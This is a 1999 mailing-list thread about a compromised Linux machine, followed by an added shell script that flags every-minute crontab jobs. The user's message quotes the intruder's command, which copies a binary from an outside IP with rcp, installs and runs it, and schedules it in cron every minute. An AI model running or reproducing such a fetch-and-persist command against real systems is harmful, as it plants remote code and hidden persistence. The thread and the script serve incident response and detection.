[OLUG] RCP
Mark Hagler
hagler at th.in.gs
Tue Dec 14 21:41:31 UTC 1999
This isn't a log of somebody using rcp to hack into your box. This is a log
of something the cracker tried to do after he was in, or tried to make some
other program execute. This command was to copy the file .../lin from
a box at IP 129.97.50.62 and replace /usr/sbin/rpc.listen on your box with it.
Then, your friend modified the crontab to run the command /usr/sbin/rpc.listen
once every minute.

There is no RPC service called "listen", so you may want to look at the
/usr/sbin/rpc.listen file and see what exactly it does. If it's a shell
script, just read it. If it's a binary, you can use strace and execute it
to trace the system calls it does, and figure out what it's doing to your
system.

Disabling the "r" service from /etc/inetd.conf is always a great idea, but
in your case this was not the issue at all.

On Tue, Dec 14, 1999 at 11:06:20AM -0600, Todd wrote:
> Can anyone tell me how to stop RCP access to my Linux box, and if there are
> any security tools available to monitor a RCP connection. On December 11
> someone gained access and performed the following to my machine:
> rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
> /usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
> /usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
> I currently am running logwatch and uwatch, but this connection did not
> show up in either. Any suggestions would be welcomed.
>
>
> -------------------------------------------------------------------------
> Sent by OLUG Mailing list Manager, run by ezmlm. http://olug.bstc.net/
> To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net`
--
Email is packaged by intellectual weight, not volume. Some
settling of contents may have occurred during transmission.
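
The persistence described in this thread (a crontab entry that runs a dropped file once every minute) can be checked for mechanically. The script below is an added example, not part of the original messages: it lists every-minute jobs in a user crontab and classifies each target as script, binary, or missing without executing it. The function names and the sample files it creates are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the thread). Input is user-crontab format, as
# produced by "crontab cron" in the quoted command; all data is constructed.

# Print the command of each entry scheduled "* * * * *" (once every minute).
every_minute_jobs() {
    awk '!/^[ \t]*#/ && NF >= 6 && $1=="*" && $2=="*" && $3=="*" && $4=="*" && $5=="*" {
        sub(/^[ \t]*(\*[ \t]+)+/, "")   # drop the five schedule fields
        print
    }'
}

# Classify a job target by its first bytes, without executing it.
classify_target() {
    [ -f "$1" ] || { echo missing; return; }
    magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case "$magic" in
        7f454c46) echo binary ;;    # ELF: inspect with strace, per the reply
        2321*)    echo script ;;    # starts with "#!": can simply be read
        *)        echo unknown ;;
    esac
}

# Read a crontab on stdin; print "<kind> <path>" for every every-minute job.
triage_crontab() {
    every_minute_jobs | while IFS= read -r cmd; do
        target=$(printf '%s\n' "$cmd" | awk '{ print $1 }')
        printf '%s %s\n' "$(classify_target "$target")" "$target"
    done
}

# Constructed demo: a stub ELF header stands in for the dropped file.
demo() {
    tmp=$(mktemp -d)
    printf '\177ELF\002\001\001' > "$tmp/rpc.listen"
    printf '#!/bin/sh\necho rotate\n' > "$tmp/rotate.sh"
    printf '%s\n' "0 4 * * * $tmp/rotate.sh" "* * * * * $tmp/rpc.listen" \
        "* * * * * $tmp/gone --quiet" > "$tmp/cron"
    triage_crontab < "$tmp/cron"
    rm -rf "$tmp"
}
demo
```

On a live system the same check is `crontab -l | triage_crontab`, run once per account; a "missing" target is still worth noting, since the entry outlives the file it pointed to.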